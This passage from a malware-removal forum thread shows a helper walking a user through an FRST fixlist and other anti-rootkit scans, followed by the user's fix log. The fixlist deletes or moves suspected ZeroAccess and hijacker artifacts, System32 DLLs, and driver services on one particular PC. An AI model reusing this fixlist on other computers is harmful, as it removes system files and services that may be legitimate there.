SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca
End

 

Give the name fixlist to the file and save it in the same folder where the FRST64 executable is placed, which is the computer's Desktop.
Now, right-click the FRST64 icon and select Run as administrator to start the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop named fixlog.txt. Please post its entire content in your next reply.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.


Next,

Please download Malwarebytes Anti-Rootkit BETA and save it to your computer's Desktop.

  • Right-click on the icon and select Run as administrator to start the extraction of the program;
  • Click Yes to accept the User Account Control security warning that may appear;
  • Click OK to extract it to your Desktop (MBAR will be launched shortly after the extraction);
  • Click on Next, and then on the Update button to let it update its database. Once the database has been successfully updated, click on Next;
  • Make sure all the checkboxes are checked, then click on the Scan button, and let it complete its scan (this can take a while);
  • Once the scan is done, if threats are found, make sure that every item is checked, and click on the Cleanup button (a reboot might be required);
  • After that (and the reboot, if one was required), go back in the mbar folder and look for a text file called mbar-log-TODAY'S-DATE.txt;
  • Please copy and paste the entire content of that log in your next reply;

 

 

Next,

Please download RogueKiller 32/64 Bits Installer (setup.exe) by Tigzy and save it to your computer's Desktop.

  • Right click on the file setup.exe and select Run as administrator to install the tool.
  • Click Yes to accept any security warnings that may appear.
  • Choose the installation language and click OK.
  • Checkmark "Install 32 and 64 bits versions" and click Next. Follow the steps to install the tool.
  • Now close all programs and browsers.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • Right-click on the RogueKiller icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Scan tab and then click the Start Scan button.
  • Wait until the scan has finished. This may take some time.
  • Once finished click on Open Report. It will open a new window.
  • Click Export TXT to export the report as a text file, give a name to the file such as RKlog.txt and save it to your Desktop.
  • Close RogueKiller.
  • Please copy and paste the entire content of RKlog.txt in your next reply.

 

To summarize, please post in your next reply the contents of:
The fixlog.txt file;
The mbar-log-TODAY'S-DATE.txt file;
The Rklog.txt file.
 

Let me see those logs and tell me how the computer is running at this point.

Thank you.

Android 8888
 



#8 krtate
Advanced Member (Full Member, 170 posts)
Posted 09 April 2017 - 04:29 PM

I moved the .exe file to my desktop.

I'm not sure if I correctly ran the FRST64.exe file the first time. The 2 logs are saved as Notepad documents on my desktop, not in a folder.

I'm not sure how to save the fixlist document to the .exe file. Please advise how I should proceed. Thank you.

OK, I think I understand now... the .exe file is on the desktop, so just make sure the fixlist document is on my desktop. It doesn't have to be in a FRST folder.


Edited by krtate, 09 April 2017 - 04:46 PM.


#9 krtate
Advanced Member (Full Member, 170 posts)
Posted 09 April 2017 - 05:06 PM

Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by KEKLR (09-04-2017 17:48:02) Run:1
Running from C:\Users\KEKLR\Desktop
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
 CreateRestorePoint:
 CloseProcesses:
 EmptyTemp:
 HKLM-x32\...\Run: [] => [X]
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
 HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
 Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
 ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
 HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
 HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
 SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
 SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
 SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
 SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
 SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
 SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
 SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
 SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
 Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
 FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
 FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
 FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
 FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
 FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
 CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
 CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
 S3 catchme; \??\C:\ComboFix\catchme.sys [X]
 U4 eabfiltr; no ImagePath
 S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
 S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
 2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
 2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
 2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
 2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
 2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
 2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
 2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
 2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
 2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
 2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
 2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
 2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
 2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
 ZeroAccess:
 C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
 2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
 2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
 2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
 2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
 2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
 C:\Windows\System32\igdumd32.dll
 C:\Windows\System32\igdumdx32.dll
 C:\Windows\System32\MFC71.DLL
 C:\Windows\System32\MFC71U.DLL
 C:\Windows\System32\MSVBVM60.DLL
 C:\Windows\System32\MSVCP71.dll
 C:\Windows\System32\MSVCR71.dll
 C:\Windows\System32\olepro32.DLL
 Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
 C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
 2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
 2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
 2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
 FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
 FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
 C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
 C:\users\keklr\appdata\local\temp\7zs14ca
 End
*****************

Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSaveSettings => value removed successfully
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\system\\WallpaperStyle => value removed successfully
C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk => moved successfully
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 () => not found.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Search Page => value removed successfully
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page => value removed successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key removed successfully
HKCR\CLSID\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key removed successfully
HKCR\CLSID\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key removed successfully
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key removed successfully
HKCR\Wow6432Node\CLSID\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key removed successfully
HKCR\Wow6432Node\CLSID\{22348997-7FD7-4759-AB9D-EB2B7A365617} => key not found.
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key removed successfully
HKCR\CLSID\{0809851D-6B6B-49C8-93A3-D43B32E2A276} => key not found.
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} => key removed successfully
HKCR\CLSID\{171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} => key not found.
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} => key removed successfully
HKCR\CLSID\{18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{CCC7A320-B3CA-4199-B1A6-9F516DD69829} => value removed successfully
HKCR\Wow6432Node\CLSID\{CCC7A320-B3CA-4199-B1A6-9F516DD69829} => key not found.
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => key removed successfully
"C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll" => not found.
"C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll" => not found.
C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => moved successfully
HKLM\System\CurrentControlSet\Services\catchme => key removed successfully
catchme => service removed successfully
HKLM\System\CurrentControlSet\Services\eabfiltr => key removed successfully
eabfiltr => service removed successfully
HKLM\System\CurrentControlSet\Services\RtsUIR => key removed successfully
RtsUIR => service removed successfully
HKLM\System\CurrentControlSet\Services\USBCCID => key removed successfully
USBCCID => service removed successfully
C:\Users\KEKLR\AppData\Local\b3751cf7 => moved successfully
C:\Users\KEKLR\AppData\Local\fc867bd779 => moved successfully
C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033} => moved successfully
C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D} => moved successfully
C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log => moved successfully
C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log => moved successfully
C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log => moved successfully
C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log => moved successfully
C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log => moved successfully
C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log => moved successfully
C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log => moved successfully
C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log => moved successfully
C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log => moved successfully
ZeroAccess: => Error: No automatic fix found for this entry.
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b} => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe => moved successfully
C:\Windows\System32\igdumd32.dll => moved successfully
C:\Windows\System32\igdumdx32.dll => moved successfully
C:\Windows\System32\MFC71.DLL => moved successfully
C:\Windows\System32\MFC71U.DLL => moved successfully
C:\Windows\System32\MSVBVM60.DLL => moved successfully
C:\Windows\System32\MSVCP71.dll => moved successfully
C:\Windows\System32\MSVCR71.dll => moved successfully
C:\Windows\System32\olepro32.DLL => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{510B196C-5350-4298-B4D2-AF749C488825} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{510B196C-5350-4298-B4D2-AF749C488825} => key removed successfully
C:\Windows\System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => key removed successfully
"C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" => not found.
"C:\Windows\system32\igdumdx32.dll" => not found.
"C:\Windows\system32\igdumd32.dll" => not found.
"C:\Windows\system32\MSVCP71.dll" => not found.
"C:\Windows\system32\MSVCR71.dll" => not found.
"C:\Windows\system32\MFC71.DLL" => not found.
"C:\Windows\system32\MFC71U.DLL" => not found.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe => value removed successfully
"C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe" => not found.
"C:\users\keklr\appdata\local\temp\7zs14ca" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 108072107 B
Java, Flash, Steam htmlcache => 1183 B
Windows/system/drivers => 2557668680 B
Edge => 0 B
Chrome => 577119028 B
Firefox => 123353957 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 33125 B
Public => 0 B
ProgramData => 0 B
systemprofile => 42320376 B
systemprofile32 => 93214 B
LocalService => 803988 B
NetworkService => 171880396 B
KEKLR => 1626892714 B

RecycleBin => 846813270 B
EmptyTemp: => 5.6 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 17:57:38 ====



#10 Android 8888
SWI Malware Tracker (Helper, 865 posts)
Posted 09 April 2017 - 05:09 PM

Hello.

Okay, no problem with that; I will give you instructions step by step.

Make sure FRST64 is placed on your computer's Desktop.

Now open Notepad, then copy the entire content of the Quote box below and paste it into the open Notepad document.

To do this, left-click with the mouse inside the Quote box below, highlight all the content of the box, then right-click on the highlighted content and select Copy.
Then click inside the blank open Notepad, right-click and select Paste.

Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
